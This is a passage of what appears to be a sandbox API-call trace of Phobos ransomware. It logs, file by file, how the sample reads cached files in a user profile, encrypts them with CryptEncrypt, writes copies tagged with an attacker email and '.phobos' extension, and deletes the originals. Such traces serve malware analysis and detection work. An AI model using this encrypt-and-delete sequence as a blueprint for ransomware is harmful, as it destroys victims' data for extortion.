lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.473] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.473] CloseHandle (hObject=0x17c) returned 1 [0196.473] CloseHandle (hObject=0x130) returned 1 [0196.473] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6")) returned 1 [0196.627] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.628] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1618) returned 1 [0196.628] CloseHandle (hObject=0x178) returned 1 [0196.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061")) returned 0x2024 [0196.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.628] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.628] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.628] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.629] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.629] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.629] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x652, lpOverlapped=0x0) returned 1 [0196.704] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x660, dwBufLen=0x660 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x660) returned 1 [0196.704] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x660, lpOverlapped=0x0) returned 1 [0196.705] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0196.705] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.705] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.705] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.705] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.705] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.705] CloseHandle (hObject=0x178) returned 1 [0196.705] CloseHandle (hObject=0x130) returned 1 [0196.705] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9c888beabccbc2a97b0d6d9214c3ba37_ebc75728c6119a77e4da8559dd10f061")) returned 1 [0196.706] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.707] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1618) returned 1 [0196.707] CloseHandle (hObject=0x130) returned 1 [0196.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852")) returned 0x2024 [0196.707] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.707] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.707] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.708] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.708] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x652, lpOverlapped=0x0) returned 1 [0196.709] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x660, dwBufLen=0x660 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x660) returned 1 [0196.709] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x660, lpOverlapped=0x0) returned 1 [0196.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0196.710] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.710] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.710] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.710] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.710] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.710] CloseHandle (hObject=0x130) returned 1 [0196.710] CloseHandle (hObject=0x178) returned 1 [0196.710] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852")) returned 1 [0196.711] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.712] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1618) returned 1 [0196.712] CloseHandle (hObject=0x178) returned 1 [0196.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8")) returned 0x2024 [0196.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.712] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.712] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.713] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.713] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.713] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x652, lpOverlapped=0x0) returned 1 [0196.714] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x660, dwBufLen=0x660 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x660) returned 1 [0196.714] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x660, lpOverlapped=0x0) returned 1 [0196.715] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0196.715] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.716] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.716] CryptDestroyKey (hKey=0xa327e8) returned 1 [0196.716] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.716] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.716] CloseHandle (hObject=0x178) returned 1 [0196.716] CloseHandle (hObject=0x130) returned 1 [0196.716] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_B89A63AC6877BD1ED812438CE82C3EB8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_b89a63ac6877bd1ed812438ce82c3eb8")) returned 1 [0196.717] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.721] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1517) returned 1 [0196.721] CloseHandle (hObject=0x130) returned 1 [0196.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150")) returned 0x2024 [0196.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.721] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.721] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0196.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.722] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa328a8) returned 1 [0196.722] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.722] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x5ed, lpOverlapped=0x0) returned 1 [0196.834] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5f0) returned 1 [0196.834] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5f0, lpOverlapped=0x0) returned 1 [0196.835] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0196.835] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0196.835] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0, dwBufLen=0xb0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xb0) returned 1 [0196.835] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.835] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x162, lpOverlapped=0x0) returned 1 [0196.835] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.835] CloseHandle (hObject=0x130) returned 1 [0196.835] CloseHandle (hObject=0x178) returned 1 [0196.835] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150")) returned 1 [0196.836] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0196.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.837] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1763) returned 1 [0196.837] CloseHandle (hObject=0x178) returned 1 [0196.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf")) returned 0x2024 [0196.837] GetFileAttributesW 